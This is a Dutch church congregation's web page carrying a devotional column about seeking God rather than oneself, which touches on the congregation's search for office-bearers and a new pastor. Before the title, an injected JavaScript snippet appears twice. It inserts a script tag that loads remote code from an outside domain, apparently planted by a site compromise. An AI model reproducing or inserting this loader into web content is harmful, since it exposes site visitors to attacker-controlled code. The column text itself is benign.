;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zoek en je zult vinden - PKN Damwâld

Zoek en je zult vinden

Gepubliceerd op: zondag 6 februari 2022

Al eeuwenlang zijn we op zoek. Op zoek naar de zin van het leven, naar de oorsprong, naar het geluk, naar vrede, noem maar op. En de laatste jaren is het ook steeds meer in, om op zoek te gaan naar jezelf. Of het nu is via meditatie, retraite, yoga of mindfullness, alles wordt aangeboden om te ontdekken wie en wat je bent of wilt zijn. Met zelfs zelfhulpboeken die beweren dat je alles kunt bereiken, met de juiste instelling. Goed? Misschien, maar het heeft ook een gevaar in zich. Nog nooit zijn er zoveel mensen geweest die stress ervaren, en jonge mensen met een burn-out. Omdat we denken en het gevoel hebben, dat we alles moeten kunnen.

Maar in de Bijbel gaat het niet zozeer om het vinden van jezelf, maar juist het vinden van God. We zijn in onze tijd zo bezig met onze zelfstandigheid, de maakbare maatschappij, dat het lastig is om dingen uit handen te geven, te vertrouwen op een hogere macht, om los te laten en te realiseren dat wij er geen invloed op hebben. In ons dagelijkse leven vergeten we dat zo makkelijk, we gaan er vanuit dat alles kan en moet zoals wij het bedacht hebben.

God geeft ons een rustpunt, Hij laat ons weten dat we niet perfect hoeven te zijn, het niet allemaal alleen hoeven te doen. Als het leven zwaar is, moeilijk, pijnlijk, de last en verantwoordelijkheden ons teveel worden, dan mogen we bij Hem komen en zeggen: Here, help mij. Ik kan het niet alleen.  In de Bijbel staat het vol met voorbeelden van mensen die twijfelen, zoeken, vragen. En altijd is God er met hulp en raad. Wat een Zegen is dat! Te mogen beseffen dat, als we het even niet meer weten, we mogen zoeken naar God, naar Zijn raad, Zijn liefdevolle hulp en bescherming.

In de jaarlijkse zoektocht naar nieuwe ambtsdragers, de zoektocht naar een nieuwe predikant, de zoektocht naar verdere samenwerking, mogen we weten dat God ons kent, weet welke zorgen ons bekruipen, de vragen waar we mee rondlopen, en dat Hij ons geeft wat we nodig hebben als we Hem daarom vragen. Als we zelf denken dat we niet sterk genoeg, goed genoeg,  vul maar in… zijn, mogen we Hem vragen om kracht, inzicht, wijsheid. Daar mogen we op vertrouwen, altijd!

Columnist:Janet

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns